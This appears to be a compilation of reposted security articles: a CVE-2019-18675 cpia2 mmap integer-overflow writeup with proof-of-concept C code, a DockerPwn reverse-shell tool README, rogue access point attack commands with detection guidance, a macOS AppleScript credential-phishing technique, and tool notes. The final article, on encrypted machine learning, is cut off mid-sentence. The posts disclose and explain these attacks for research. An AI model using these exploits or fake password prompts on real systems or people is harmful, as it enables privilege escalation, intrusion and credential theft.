  6. Kernel Research / mmap handler exploitation November 22, 2019 Description Recently I started to review the linux kernel, I’ve putted much time and effort trying to identify vulnerabilities. I looked on the cpia2 driver , which is a V4L driver , aimed for supporting cpia2 webcams. official documentation here. I found a vulnerability in the mmap handler implementation of the driver. Kernel drivers may re-implement their own mmap handlers , usually for speeding up the process of exchanging data between user space and kernel space. The cpia2 driver re-implement a mmap hanlder for sharing the frame’s buffer with the user application which controls the camera. — Lets get into it Here is the userspace mmap function prototype (taken from man): void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset); Here the user supplies parameter for the mapping , we will be interested in the size and offset parameters. length - will determine the length of the mapping offset - will determine the offset from the beginning of the device we will start the mapping from. The driver’s specific mmap handler will remap kernel memory to userspace using a function like remap_pfn_range CVE-2019-18675 Lets have a look at the cpia2 mmap handler implementation: We can see the file_operations struct: /*** * The v4l video device structure initialized for this device ***/ static const struct v4l2_file_operations cpia2_fops = { .owner = THIS_MODULE, .open = cpia2_open, .release = cpia2_close, .read = cpia2_v4l_read, .poll = cpia2_v4l_poll, .unlocked_ioctl = video_ioctl2, .mmap = cpia2_mmap, }; Lets look at the function cpia2_mmap static int cpia2_mmap(struct file *file, struct vm_area_struct *area) { struct camera_data *cam = video_drvdata(file); int retval; if (mutex_lock_interruptible(&cam->v4l2_lock)) return -ERESTARTSYS; retval = cpia2_remap_buffer(cam, area); if(!retval) cam->stream_fh = file->private_data; mutex_unlock(&cam->v4l2_lock); return retval; } It just calls the function cpia2_remap_buffer() with a pointer to the camera_data struct: /****************************************************************************** * * cpia2_remap_buffer * *****************************************************************************/ int cpia2_remap_buffer(struct camera_data *cam, struct vm_area_struct *vma) { const char *adr = (const char *)vma->vm_start; unsigned long size = vma->vm_end-vma->vm_start; unsigned long start_offset = vma->vm_pgoff << PAGE_SHIFT; unsigned long start = (unsigned long) adr; unsigned long page, pos; DBG("mmap offset:%ld size:%ld\n", start_offset, size); if (!video_is_registered(&cam->vdev)) return -ENODEV; if (size > cam->frame_size*cam->num_frames || (start_offset % cam->frame_size) != 0 || (start_offset+size > cam->frame_size*cam->num_frames)) return -EINVAL; pos = ((unsigned long) (cam->frame_buffer)) + start_offset; while (size > 0) { page = kvirt_to_pa(pos); if (remap_pfn_range(vma, start, page >> PAGE_SHIFT, PAGE_SIZE, PAGE_SHARED)) return -EAGAIN; start += PAGE_SIZE; pos += PAGE_SIZE; if (size > PAGE_SIZE) size -= PAGE_SIZE; else size = 0; } cam->mmapped = true; return 0; } we can see that start_offset + size is being calculated , and the sum is being compared to the total size of the frames: if(... || (start_offset+size > cam->frame_size*cam->num_frames)) return -EINVAL; However, the calculation start_offset + size could wrap-around to a low value (a.k.a Integer Overflow), allowing an attacker to bypass the check while still using a big start_offset value which will lead to mapping of unintended kernel memory. The only requirement is that the start_offset value will be a multiple of the frame_size (which can be controlled by the cpia2 driver options, by default its 68k). And this can be quite bad because a huge offset will allow us to perform a mapping in an arbitrary offset (outside of the frame buffer’s bounds) , and this can possibly result in a privillege escalation Demo time! I’ve used a qemu kernel virtual machine (here). Now we have to: Open /dev/video0 mmaping size 0x11000 at offset 0xffffffffffff0000. The overlow will ocuur and we will pass the check Here is a minimalistic example for exploit code: #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/mman.h> #include <sys/types.h> #include <unistd.h> #define VIDEO_DEVICE "/dev/video0" int main(){ pid_t pid; char command[40]; int fd = open(VIDEO_DEVICE , O_RDWR); if(fd < 0){ printf("[-]Error opening device file\n"); } printf("[+]Demonstration\n"); pid = getpid(); printf("[~]PID IS %d ", pid); getchar(); int size = 0x11000; unsigned long mapStarter = 0x43434000; unsigned long * mapped = mmap((void *)mapStarter, size, PROT_WRITE | PROT_READ, MAP_SHARED , fd , 0xffffffffffff0000); if(mapped == MAP_FAILED) printf("[-]Error mapping the specified region\n"); else puts("[+]mmap went successfully\n"); /*view the /proc/<pid>/maps file */ sprintf(command , "cat /proc/%d/maps", pid); system(command); return 0; } Compile and run: and B00M! we have got a read and write primitives in kernel space! By modifying struct cred or kernel function pointers/ variables we can possibly gain root! or destroy kernel data! Tips and thoughts Because I didnt have the required hardware (for example, Intel Qx5 microscope ), I’ve made some changes in the driver’s code for this poc . I made some changes to the hardware and usb’s parts, In a way that allowed me to test the mmap functionallity as its in the original driver . Because the vulnerability is not related to the hardware interaction partsl , this wasn’t a problem. This way I could research more and even debug the interesting parts without being depend on hardware. This vulnerability is more than 8 years old! This is my first public vulnerability! Additional info CVE-2019-18675 on NVD CVE-2019-18675 on Mitre Sursa: https://deshal3v.github.io/blog/kernel-research/mmap_exploitation
  7. DockerPwn.py Automation for abusing an exposed Docker TCP Socket. This will automatically create a container on the Docker host with the host's root filesystem mounted, allowing arbitrary read and write of the host filesystem (which is bad). Once created, the script will employ the method of your choosing for obtaining a root shell. All methods are now working properly, and will return a reverse shell. Chroot is the least disruptive, but Useradd is the default. Installation: It is recommended that you utilize the following for usage as opposed to static releases - Code in this repository may be updated frequently with minor improvements before releases are created. git clone https://github.com/AbsoZed/DockerPwn.py && cd DockerPwn.py Methods: All shell I/O is logged to './DockerPwn.log' for all methods. UserPwn: Creates a 'DockerPwn' user, and adds them to /etc/sudoers with NOPASSWD. The handler automatically escalates to root using this privilege, and spawns a PTY. ShadowPwn: Changes root and any valid user passwords to 'DockerPwn' in /etc/shadow, authenticates with Paramiko, and sends a reverse shell. The handler automatically escalates to root utilzing 'su', and spawns a PTY. ChrootPwn: Creates a shell.sh file which is a reverse shell, hosts on port 80. Downloads to /tmp, Utilizes chroot in docker container to execute shell in the context of the host, providing a container shell with interactivity to the host filesystem. Roadmap: SSL Support for :2376 Usage: DockerPwn.py [-h] [--target TARGET] [--port PORT] [--image IMAGE] [--method METHOD] [--c2 C2] optional arguments: -h, --help show this help message and exit --target TARGET IP of Docker Host --port PORT Docker API TCP Port --image IMAGE Docker image to use. Default is Alpine Linux. --method METHOD Method to use. Valid methods are shadowpwn, chrootpwn, userpwn. Default is userpwn. --c2 C2 Local IP and port in [IP]:[PORT] format to receive the shell. Sursa: https://github.com/AbsoZed/DockerPwn.py
  8. Modern Wireless Tradecraft Pt IV — Tradecraft and Defensive Strategy Gabriel Ryan Follow Nov 23 · 9 min read We’ve gone over a lot of information in the last three sections of this writeup. In case you missed them, you can find them here: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee https://posts.specterops.io/modern-wireless-attacks-pt-ii-mana-and-known-beacon-attacks-97a359d385f9 https://posts.specterops.io/modern-wireless-tradecraft-pt-iii-management-frame-access-control-lists-mfacls-22ca7f314a38 Now it’s time to make sense of it all, and talk about how each of the techniques we described fits into our toolkit from an operational perspective. Before we begin, we need to establish some important points from which we’ll build a frame of reference. The first of these is that wireless attacks are inherently risky, since they must be executed within line-of-sight distance to the target. Wireless attacks are a bit like motorcycles: they’re fun, they can be a fast way to get from point A to point B, but they do come with risks that must be managed in order to be used effectively. I’m pretty opinionated about this: I believe that because of the inherent risk, wireless tradecraft needs to be: Pragmatic: Focus should be placed on vetted techniques that are known to work reliably. Attacks should be prepared in advance instead of developed or prepared onsite. Disciplined: Attacks should be executed with deliberation against specific targets to achieve desired outcomes. Attacks should be supervised as they progress. “Spray and pray” tactics such as automatic deauthing should be avoided. Flexible: Techniques should be adjusted in realtime based on observed results. Impact Focused: Focus should be placed on attacks that reliably generate maximum impact in minimum time. Impact Focused Wireless Attacks The last point is particularly important. I do not believe that SSLStripping or Credential Sniffing are practices that belong in modern wireless playbooks for this reason. The widespread adoption of HSTS and Certificate Pinning means that using these techniques is largely a waste of time, and time is a valuable commodity that can lead to detection if not properly managed. With that out of the way, here are some situations in which I think that the use of wireless tradecraft can actually make sense: Breaching Wireless Networks: This is the obvious one. The end goal may be to gain access to an internal corporate network, or it may be something simpler like direct access to surveillance equipment, point-of-sale systems, or other networked hardware. Payload Delivery: APTs will phish under most circumstances, and you should too. However if phishing isn’t your thing or the situation calls for something different, rogue AP attacks can be a startlingly effective platform through which to deliver payloads to WiFi enabled devices. Once you’ve forced a device to connect to you, you gain the ability to act as either a captive portal or an internet gateway. As a captive portal, you can redirect users to pages that prompt them to install implants (aka “updates”), and restrict their Internet access until they comply. When acting as a network gateway, you can inject malicious code into static content (i.e. modify unencrypted JavaScript files in transit, etc). In both cases, you can restrict communication to endpoint protection servers, buying you time to complete the attack. AD Credential Theft: Many organizations tie their wireless infrastructure into Active Directory (AD). If these organizations use weak WPA/2-EAP configurations, the same attacks that you’d use to breach the wireless perimeter can also be effective tools for harvesting AD credentials. Until recently, it was even possible to use HTTP-to-SMB redirection to force Windows devices to surrender AD credentials, although this flaw seems to have been patched in Chrome and Edge within the past year (see: https://github.com/s0lst1c3/eaphammer/wiki/III.-Stealing-AD-Credentials-Using-Hostile-Portal-Attacks). For the sake of simplicity, let’s group these scenarios into the two overarching use-cases: Breaching Wireless Networks Targeting Client Devices In the sections that follow, we’ll example the suitability of each of the techniques we’ve learned for these two specific purposes. Choosing a Rogue AP Technique Evil Twin Attacks Optimal Use-Case: Breaching Wireless Perimeter Evil Twin attacks are the primary means of attacking WPA/2-EAP networks, and can be a also be an effective means of attacking WPA/2-PSK networks. Breaching WPA/2-EAP networks involves using rogue AP attacks to exploit weak EAP configurations. This is a topic for which educational material is already widely available, so I’m not going to cover this in depth in this post. With that said, here’s a quick primer on the subject if you’re interested: http://solstice.sh/workshops/advanced-wireless-attacks/ii-attacking-and-gaining-entry-to-wpa2-eap-wireless-networks/ To attack a WPA/2-PSK network using an evil twin, you create a rogue access point with the same ESSID as the target and configure it to use WPA/2-PSK. You then capture the first two messages of the 4-way WPA handshake from any client that attempts to connect, and crack them to obtain the plaintext password. To perform this attack using EAPHammer, use the --creds flag in conjunction with the —-auth wpa-psk flag: ./eaphammer -i wlan0 -e exampleCorp -c 1 — creds — auth wpa-psk I should point out that this is not a new attack: it’s existed in hostapd-mana since January 2019 and in airbase-ng since dinosaurs roamed the earth. Secondary Use-Case: Targeting Client Devices Evil Twin attacks can be a good choice for targeting specific client devices if you have knowledge of at least one network on the device’s PNL. However, this approach can be dangerous. Evil Twins broadcast beacon frames by default, which prevent us from using MAC-based MFACLs to restrict the attack’s impact to specific devices. If the ESSID of the evil twin is target specific (i.e. you’re attacking EvilCorp and the ESSID of your rogue AP is something specific to EvilCorp’s infrastructure), then you’re probably ok. But if your rogue AP has a fairly common ESSID such as “attwifi”, you stand a high chance of causing collateral damage. Using EAPHammer’s --cloaking full flag can mitigate a lot of this risk, because it will cause your AP to rely exclusively on broadcast probe responses to force targets to connect. ./eaphammer -i wlan0 -e exampleCorp -c 1 — hostile-portal — cloaking full — auth owe However, cloaked evil twin attacks can be stopped using many of the same countermeasures that are used to stop classic karma attacks, so this may not be the best approach. Opsec Considerations Savvy network defenders often whitelist their access points by BSSID. As an attacker, you can circumvent these restrictions by spoofing the BSSID of a whitelisted IP (make sure to choose one that is a considerable distance away to avoid BSS conflicts). You should try to match the capabilities of the target access point though, since failure to do so will make your rogue AP stick out like a sore thumb. MANA (and loud MANA) Attacks Optimal Use-Case: Targeting Client Devices MANA (and all karma-style attacks for that matter) are mainly designed for situations in which you need to target a client device but do not know the device’s PNL. They are also ideal for targeting specific devices, since they can be controlled using MAC-based MFACLs (unlike Evil Twins which rely primarily on beacon frames). Secondary Use-Case: Breaching Wireless Perimeter If the goal of the attack is to steal credentials for a WPA network, an evil twin is generally a better choice. However, it can make sense to use MANA attacks to breach WPA/2-PSK and WPA/2-EAP networks when Wireless Intrusion Prevention Systems (WIPS) are present. MANA attacks can be used to execute a quieter version of the traditional evil twin attack. To do this, begin by creating an ESSID whitelist file containing the ESSID of the target access point: echo exampleCorp > target-ess.txt Next, create a MAC address whitelist file containing the MAC addresses of our targets: echo 00:CB:19:D1:DD:B2 > mac-whitelist.txt echo A3:A5:9A:A9:B3:A4 >> mac-whitelist.txt echo FE:47:F2:7B:69:5C >> mac-whitelist.txt echo C0:AF:A8:23:8D:7E >> mac-whitelist.txt echo 33:58:A1:6E:A4:5F >> mac-whitelist.txt echo C1:62:2A:5D:F8:80 >> mac-whitelist.txt Next, create a rogue AP with the following configuration: cloaking enabled ESSID of target network 802.11w enabled (but not required) to prevent deauths from WIPS MAC-based MFACL to restrict probe responses to specific devices ESSID-based MFACL to restrict probe responses to target network Set auth to either WPA-PSK or WPA-EAP (depending on target network configuration) ./eaphammer -i wlan0 \ --e exampleCorp \ — pmf enable \ — cloaking full \ — mana \ — auth wpa-eap \ — creds \ — mac-whitelist mac-whitelist.txt \ — ssid-whitelist target-ess.txt Optional: deauthenticate client devices to coerce them to roam to new AP: for i in `cat mac-whitelist.txt`; do aireplay-ng -0 5 -a de:ad:be:ef:13:37 -c $i; done The rogue AP will stay “dormant” (not advertise its presence) until it receives probe requests from the target device(s), at which point it will respond in an attempt to trick the targets into associating. Opsec Considerations All karma-style attacks (including MANA) create a an easily detectable one-to-many relationship between a single BSSID and multiple ESSIDs. See the section on detection strategies for more information. Known Beacon Attacks Optimal Use-Case: Targeting Client Devices Known Beacon attacks make sense in situations where you do not know the target devices’ PNL and where MANA attacks fail. Opsec Considerations Known beacon attacks are extremely loud due to the one-to-many relationship they create between a single BSSID and numerous ESSIDs. They also have a high potential for collateral damage. MAC-based MFACLs can limit this collateral damage to some extent — devices will still attempt to connect to your rogue AP, even though they won’t be able to complete the association process. Depending on the rogue AP’s transmission rate and the number of spoofed ESSIDs in use, known beacon attacks can cause network congestion. Detection Strategies Rogue AP detection is a pretty expansive topic, so this won’t be an exhaustive writeup. I do plan on writing at least one dedicated post on this subject in the future though, most likely geared towards Kibana and Wifibeat. With that out of the way, here’s a list of fundamental indicators that any Wireless Intrusion Prevention System (WIPS) should monitor for: 1. New ESSIDs It’s unusual to see new ESSs appear out of nowhere. Although the presence of a new ESS is not an indicator by itself, it does warrant additional investigation. 2. Legacy versions of 802.11 Most modern networking hardware uses 802.11ac, although it’s not uncommon to see 802.11n deployed in production as well. On the other hand, the vast majority of wireless pentesting hardware is limited to 802.11n and earlier. Unless adversaries are particularly aware of what they’re doing, they are likely to use an external wireless interface that is limited to 802.11g or 802.11a. If you suddenly see a new ESS appear and operating in 802.11g/a mode, that’s a pretty good indication that you should take a closer look. 3. Uncommon OUIs The first three octets of any device’s MAC address contains an Organizationally Unique Identifier (OUI) that is used to uniquely identify the device’s manufacturer. Most rogue AP attacks are executed using external hardware made by manufacturers such as Alfa, TP-Link, and Panda Wireless. As such, it’s typically a good idea to monitor for devices that have OUIs that from these types of manufacturers. 4. ESSID Whitelist Violations Keep an inventory of BSSIDs in your network, and use it as a whitelist. If you see an access point that is using your ESSID but is not in your whitelist, that is a strong indication that your network is being attacked. 5. One-to-many relationships A single BSSID should never map to more than one ESSID. The presence of multiple beacon packets or probe response packets for multiple ESSIDs originating from a single BSSID is a strong indicator of malicious activity. 6. Known default settings for rogue AP attack tools Most publicly available tools for performing rogue AP attacks (including the WiFi Pineapple and EAPHammer) have easily identifiable default settings. For example, both EAPHammer and the WiFi Pineapple have a default BSSID of either00:11:22:33:44:00 or 00:11:22:33:44:55. Additionally, EAPHammer has a default ESSID of eaphammer which is still present during karma / MANA attacks unless manually specified by the user. These defaults are basically built-in “skid” filters that were, at least in the case of EAPHammer, deliberately included to make irresponsible use easier to detect. Conclusion This concludes our primer series Modern Wireless Tradecraft. Posts By SpecterOps Team Members Posts from SpecterOps team members on various topics relating information security Written by Gabriel Ryan Follow Researcher and Infosec Journeyman. Red / Blue multiclass battlemage @SpecterOps. I enjoy low-level code and things without wires. Views are my own. #hacking 247 Sursa: https://posts.specterops.io/modern-wireless-tradecraft-pt-iv-tradecraft-and-detection-d1a95da4bb4d
      • 1
      • Like
  9. macOS Red Team: Spoofing Privileged Helpers (and Others) to Gain Root By Phil Stokes - November 25, 2019 As we saw in previous posts, macOS privilege escalation typically occurs by manipulating the user rather than exploiting zero days or unpatched vulnerabilities. Looking at it from from the perspective of a red team engagement, one native tool that can be useful in this regard is AppleScript, which has the ability to quickly and easily produce fake authorization requests that can appear quite convincing to the user. Although this in itself is not a new technique, in this post I will explore some novel ways we can (ab)use the abilities of AppleScript to spoof privileged processes the user already trusts on the local system. What is a Privileged Helper Tool? Most applications on a Mac don’t require elevated privileges to do their work, and indeed, if the application is sourced from Apple’s App Store, they are – at least technically – not allowed to do so. Despite that, there are times when apps have quite legitimate reasons for needing privileges greater than that possessed by the currently logged in user. Here’s a short list, from Apple’s own documentation: manipulating file permissions, ownership creating, reading, updating, or deleting files opening privileged ports for TCP and UDP connections opening raw sockets managing processes reading the contents of virtual memory changing system settings loading kernel extensions Often, programs that need to perform any of these functions only need to do so occasionally, and in that context it makes sense to simply ask the user for authorization at the time. While this may improve security, it is also not the most convenient if the program in question is going to need to perform one or more of these actions more than once in any particular session. Users are not fond of repeated dialog alerts or of repeatedly having to type in a password just to get things done. Privilege separation is a technique that developers can use to solve this problem. By creating a separate “helper program” with limited functionality to carry out these tasks, the user need only be asked at install time for permission to install the helper tool. You’ve likely seen permission requests that look something like this: The helper tool always runs with elevated privileges, but it is coded with limited functionality. At least in theory, the tool can only perform specific tasks and only at behest of the parent program. These privileged helper tools live in a folder in the local domain Library folder: /Library/PrivilegedHelperTools Since they are only installed by 3rd party programs sourced from outside of the App Store, you may or may not have some installed on a given system. However, some very popular and widespread macOS software either does or has made use of such tools. Since orphaned Privileged Helper Tools are not removed by the OS itself, there’s a reasonable chance that you’ll find some of these in use if you’re engaging with an organisation with Mac power users. Here’s a few from my own system that use Privileged Helper Tools: BBEdit Carbon Copy Cloner Pacifist Abuses of this trust mechanism between parent process and privileged helper tool are possible (CVE-2019-13013), but that’s not the route we’re going to take today. Rather, we’re going to exploit the fact that there’s a high chance the user will be familiar with the parent apps of these privileged processes and inherently trust requests for authorization that appear to be coming from them. Why Use AppleScript for Spoofing? Effective social engineering is all about context. Of course, we could just throw a fake user alert at any time, but to make it more effective, we want to : Make it look as authentic as possible – that means, using an alert with convincing text, an appropriate title and preferably a relevant icon Trigger it for a convincing reason – apps that have no business or history of asking for privileges are going to raise more suspicion than those that do. Hence, targeting Privileged Helper tools are a useful candidate, particularly if we provide enough authentic details to pass user scrutiny. Trigger it at an appropriate time, such as when the user is currently using the app that we’re attempting to spoof. All of these tasks are easy to accomplish and combine using AppleScript. Here’s an example of the sort of thing we could create using a bit of AppleScripting. The actual dialog box is fairly crude. We haven’t got two fields for input for both user name and password, for one thing (although as we’ll see in Part 2 that is possible), but even so this dialog box has a lot going for it. It contains a title, an icon and the name of a process that if the user were to look it up online, would lead them back to the Privileged Helper tool that they can verify exists in their own /Library/PrivilegedHelperTools folder. The user would have to dig quite a bit deeper in order to actually discover our fraud. Of course, a suspicious user might just press “Cancel” instead of doing any digging at all. Fortunately, using AppleScript means we can simultaneously make our request look more convincing and discourage our target from doing that again by wiring up the “Cancel” button to code that will either kill the parent app or simply cause an infinite repeat. An infinite repeat might raise too many suspicions, however, but killing the app and throwing a suitable alert “explaining” why this just happened could look far more legitimate. When the user relaunches the parent app and we trigger our authorization request again, the user is now far more likely to throw in the password and get on with their work. For good measure, we can also reject the user’s first attempt to type the password and make them type it twice. Since what is typed isn’t shown back to the user, making typos on password entry is a common experience. Forcing double entry (and capturing the input both times) should ensure that if the first attempt contained a typo or was not correct, the second one should be (we could also attempt to verify the user’s password directly before accepting it, but I shall leave such details aside here as we’ve already got quite a lot of work to get through!). Creating the Spoofing Script If you are unfamiliar with AppleScript or haven’t looked at how it has progressed in recent years since Yosemite 10.10, you might be surprised to learn that you can embed Objective-C code in scripts and call Cocoa and Foundation APIs directly. That means we have all the power of native APIs like NSFileManager, NSWorkspace, NSString, NSArray and many others. In the examples below, I am using a commercial AppleScript editor, but which is also available in a free version and which is far more effective as an AppleScript development environment than the unhelpful built-in Script Editor app. As with any other scripting or programming language, we need to “import” the frameworks that we want to use, which we do in AppleScript with the use keyword. Let’s put the following at the top of our script: These act as both shortcuts and a bridge to the AppleScript-Objective C scripting bridge and make the named APIs accessible in a convenient manner, as we’ll see below. Next, let’s write a couple of “handlers” (functions) to enumerate the PrivilegedHelper tools directory. In the image below, the left side shows the handler we will write; on the right side is an example of what it returns on my machine. As we can see, this handler is just a wrapper for another handler enumerateFolderContents:, which was borrowed from a community forum. Let’s take a look at the code for that, which is a bit more complex: # adapted from a script by Christopher Stone on enumerateFolderContents:aFolderPath set folderItemList to "" as text set nsPath to current application's NSString's stringWithString:aFolderPath --- Expand Tilde & Symlinks (if any exist) --- set nsPath to nsPath's stringByResolvingSymlinksInPath() --- Get the NSURL --- set folderNSURL to current application's |NSURL|'s fileURLWithPath:nsPath set theURLs to (NSFileManager's defaultManager()'s enumeratorAtURL:folderNSURL includingPropertiesForKeys:{} options:((its NSDirectoryEnumerationSkipsPackageDescendants) + (get its NSDirectoryEnumerationSkipsHiddenFiles)) errorHandler:(missing value))'s allObjects() set AppleScript's text item delimiters to linefeed try set folderItemList to ((theURLs's valueForKey:"path") as list) as text end try return folderItemList end enumerateFolderContents: Now that we have our list of Privileged Helper Tools, we will want to grab the file names separately from the path as we will use these names in our message text to boost our credibility. In addition, we want to find the parent app from the Helper tool’s binary both so that we can show this to the user and because we will also need it to find the app’s icon. This is how we do the first task, again with the code on the left and example output shown on the right: Now that we have our targets, all that remains is to find the parent apps. For that, we’ll borrow and adapt from Erik Berglund’s script here. In this example, we can see the parent application’s bundle identifier is “com.barebones.bbedit”. There are a number of ways we can extract the identifier substring from the string, such as using command line utils like awk (as Erik does), or using cut to slice fields, but I’ll stick to Cocoa APIs for both the sake of speed and to avoid unnecessarily spawning more processes. Be aware with whatever technique you use, the identifier does not always occur in the same position and may not begin with “com”. In all cases that I’m aware of, though, it does follow immediately after the keyword “identifier”, so I’m going to use that as my primary delimiter. Do ensure your code accounts for edge cases (I’ll omit error checking here for want of space). In the code above, I use Cocoa APIs to first split the string around either side of the delimiter. That should leave me with the actual bundle identifier at the beginning of the second substring. Note the as text coercion at the end. One hoop we have to jump through when mixing AppleScript and Objective C is converting back and forth between NSStrings and AppleScript text. With the parent application’s bundle identifier to hand, we can find the parent application’s path thanks to NSWorkspace. We’ll also add a loop to do the same for all items in the PrivilegedHelperTools folder. Note how I’ve moved the text conversion away from the bundleID variable because I still need the NSString for the NSWorkspace call that now follows it. The text conversion is delayed until I need the string again in an AppleScript call, which occurs at the end of the repeat method. At this point, we now have the names of each Privileged Helper tool and its path, as well as the bundle identifier and path to each helper tool’s parent app. With this information, we have nearly everything we need for our authorization request. The last remaining step is to grab the application icon from each parent app. Grabbing the Parent Application’s Icon Image Application icons typically live in the application bundle’s Resources folder and have a .icns extension. Since we have the application’s path from above it should be a simple matter to grab the icon. Before we go on, we’ll need to add a couple of “helper handlers” for what’s coming next and to keep our code tidy. Also, at the top of our script, we define some constants. For now, we’ll leave these as plain text, but we can obscure them in various ways in our final version. Notice the defaultIconStr constant, which provides our default. If you want to see what this looks like, try calling it with the following command: -- let's get the user name from Foundation framework: set userName to current application's NSUserName() display dialog hlprName & my makeChanges & return & my privString & userName & my allowThis default answer "" with title parentName default button "OK" with icon my software_update_icon as «class furl» with hidden answer Hmm, not bad, but not great either. It would look so much better with the app’s actual icon. The icon name is defined in the App’s Info.plist. Let’s add another handler to grab it: Here’s our code for grabbing the icon tidied up: And here’s a few examples of what our script produces now: Conclusion Our authorization requests are now looking reasonably convincing. They contain an app name, and a process name, both of which will check out as legitimate if the user decides to look into them. We also have a proper password field and we call the user out by name in the message text. And it’s worth reminding ourselves at this point that all this is achieved without either triggering any traps set in Mojave and Catalina for cracking down on AppleScript, without knowing anything in advance about what is on the victim’s computer and, most importantly, without requiring any privileges at all. Indeed, it’s privileges that we’re after, and in the next part we’ll continue by looking at the code to capture the password entered by the user as well as how to launch our spoofing script at an appropriate time when the user is actually using one of the apps we found on their system. We’ll see how we can adapt the same techniques to target other privileged apps that use kexts and LaunchDaemons rather than Privileged Helper tools. As a bonus, we’ll also look into advanced AppleScript techniques for building even better, more convincing dialog boxes with two text fields. If you enjoyed this post, please subscribe to the blog and we will let you know when the next part is live! Disclaimer To avoid any doubt, all the applications mentioned in this post are perfectly legitimate, and to my knowledge none of the apps contain any vulnerabilities related to the content of this post. The techniques described above are entirely out of control of individual developers. Sursa: https://www.sentinelone.com/blog/macos-red-team-spoofing-privileged-helpers-and-others-to-gain-root/
  10. November 26, 2019 In this paper, I introduce the reader to a heap metadata corruption against the latest version of uClibc. This allocator is used in embedded systems. The unlink attack on heaps was first introduced by Solar Designer in the year 2000 and was the first generic heap exploitation technique made public. In the unlink technique, an attacker corrupts the prev and next pointers of a free chunk. In a subsequent malloc that recycles this chunk, the chunk is unlinked from its freelist via pointer manipulations. This inadvertently allows an attack to craft a write-what-where primitive and write what they want where they want in memory. This attack is historical, but also exists today in uClibc. uClibc Unlink Heap Exploitation.PDF Sursa: https://blog.infosectcbr.com.au/2019/11/uclibc-unlink-heap-exploitation.html
  11. Nytro

    Chepy

    Chepy Chepy is a python library with a handy cli that is aimed to mirror some of the capabilities of CyberChef. A reasonable amount of effort was put behind Chepy to make it compatible to the various functionalities that CyberChef offers, all in a pure Pythonic manner. There are some key advantages and disadvantages that Chepy has over Cyberchef. The Cyberchef concept of stacking different modules is kept alive in Chepy. There is still a long way to go for Chepy as it does not offer every single ability of Cyberchef. Docs Refer to the docs for full usage information Example For all usage and examples, see the docs. Chepy has a stacking mechanism similar to Cyberchef. For example, this in Cyberchef: This is equivalent to from chepy import Chepy file_path = "/tmp/demo/encoding" print( Chepy(file_path) .load_file() .reverse() .rot_13() .base64_decode() .base32_decode() .hexdump_to_str() .o ) Installation Chepy can be installed in a few ways. Pypi pip3 install chepy Git git clone https://github.com/securisec/chepy.git cd chepy pip3 install -e . # I use -e here so that if I update later with git pull, I dont have it install it again (unless dependencies have changed) Pipenv git clone https://github.com/securisec/chepy.git cd chepy pipenv install Docker docker run --rm -ti -v $PWD:/data securisec/chepy "some string" [somefile, "another string"] Chepy vs Cyberchef Advantages Chepy is pure python with a supporting and accessible python api Chepy has a CLI Chepy CLI has full autocompletion. Extendable via plugins Chepy has the concept of recipes which makes sharing much simpler. Infinitely scalable as it can leverage the full Python library. Chepy can interface with the full Cyberchef web app to a certain degree. It is easy to move from Chepy to Cyberchef if need be. The Chepy python library is significantly faster than the Cyberchef Node library. Works with HTTP/S requests without CORS issues. Disadvantages Chepy is not a web app (at least for now). Chepy does not offer every single thing that Cyberchef does Chepy does not have the magic method (at the moment) .. toctree:: :maxdepth: 3 :caption: Contents: usage.md examples.md cli.rst chepy.md core.md modules.rst extras.rst plugins.md pullrequest.md Indices and tables ================== * :ref:`genindex` * :ref:`modindex` * :ref:`search` Sursa: https://github.com/securisec/chepy
  12. Frida/QBDI Android API Fuzzer This experimetal fuzzer is meant to be used for API in-memory fuzzing on Android. The desing is highly inspired and based on AFL/AFL++. ATM the mutator is quite simple, just the AFL's havoc stage and the seed selection is simply FIFO (no favored paths, no trimming, no extra features). Obviously these features are planned, if you want to contribute adding them PR are well accepted. ATM I tested only on the two examples under tests/, this is a very WIP project. How to This fuzzer is known to work in the Android Emulator (tested on x86_64) but should work on any rooted x86 Android device in theory. Firstly, download the Android x86_64 build of QBDI and extract the archive in a subdirectory of this project named QBDI. Then install Frida on your host with pip3 install frida. Make sure to have the root shell and SELinux disabled on your virtual device: host$ adb root host$ adb shell setenforce 0 Download the Android x86_64 frida-server from the repo release page and copy it on the device under /data/local/tmp (use adb push). Copy libQBDI.so always in /data/local/tmp. Start a shell and run the frida-server: device# cd /data/local/tmp device# ./frida-server-12.7.22-android-x86_64 Now install the test app tests/app-debug.apk using the drag & drop into the emulator window. Then, open the app. Compile the agent script wiht frida-compile: host$ frida-compile -x index.js -o frida-fuzz-agent.js Fuzz the test_func function of the libnative-lib.so library shipped with the test app with the command: host$ python3 fuzz.py output_folder/ com.example.ndktest1 Both interesting testcases and crashes are saved into output_folder. Enjoy. Sursa: https://github.com/andreafioraldi/frida-qbdi-fuzzer
  13. Machine Learning on Encrypted Data Without Decrypting It 22 Nov 2019 | Keno Fischer Note: This post discusses cutting edge cryptographic techniques. It is intended to give a view into research at Julia Computing. Do not use any examples in this blog post for production applications. Always consult a professional cryptographer before using cryptography. TL;DR: click here to go directly to the package that implements the magic and here for the code that we’ll be talking about in this blog post. Introduction Suppose you have just developed a spiffy new machine learning model (using Flux.jl of course) and now want to start deploying it for your users. How do you go about doing that? Probably the simplest thing would be to just ship your model to your users and let them run it locally on their data. However there are a number of problems with this approach: ML models are large and the user’s device may not have enough storage or computation to actually run the model. ML models are often updated frequently and you may not want to send the large model across the network that often. Developing ML models takes a lot of time and computational resources, which you may want to recover by charging your users for making use of your model. The solution that usually comes next is expose the model as an API on the cloud. These machine learning-as-a-service offerings have sprung up in mass over the past few years, with every major cloud platform offering such services to the enterprising developer. The dilemma for potential users of such products is obvious: User data is now processed on some remote server that may not necessarily be trustworthy. This has clear ethical and legal ramifications that limit the areas where such solutions can be effective. In regulated industries, such as medicine or finance in particular, sending patient or financial data to third parties for processing is often a no-go. Can we do better? As it turns out we can! Recent breakthroughs in cryptography have made it practical to perform computation on data without ever decrypting it. In our example, the user would send encrypted data (e.g. images) to the cloud API, which would run the machine learning model and then return the encrypted answer. Nowhere was the user data decrypted and in particular the cloud provider does not have access to either the orignal image nor is it able to decrypt the prediction it computed. How is this possible? Let’s find out by building a machine learning service for handwriting recognition of encrypted images (from the MNIST dataset). HE generally The ability to compute on encrypted data is generally referred to as “secure computation” and is a fairly large area of research, with many different cryptographic approaches and techniques for a plethora of different application scenarios. For our example, we will be focusing on a technique known as “homomorphic encryption”. In a homomorphic encryption 